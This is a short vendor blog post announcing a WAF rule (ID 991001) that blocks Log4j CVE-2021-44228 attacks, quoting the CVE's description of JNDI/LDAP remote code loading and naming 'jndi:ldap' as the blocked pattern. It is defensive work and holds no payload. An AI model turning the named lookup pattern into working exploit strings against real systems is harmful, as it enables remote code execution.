Blocking CVE-2021-44228 / Log4j Vulnerability on Nova

by Dave Blakey on • December 11, 2021

As you have no doubt already seen, a critical vulnerability in Log4j is making waves on the internet, specifically CVE-2021-44228.

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

The most common attack types we've seen were already pre-blocked by Nova WAFs, as seen below: base64_block

However, we have added an additional block specifically for the jndi:ldap vulnerability. To ensure you have it simply redeploy (click Save or Attach) your ADCs to immediately apply the new update.

We recommend all users keep the new rule (ID 991001) enabled due to the large number of applications that utilize log4j2. You will see blocks for the new rule as below: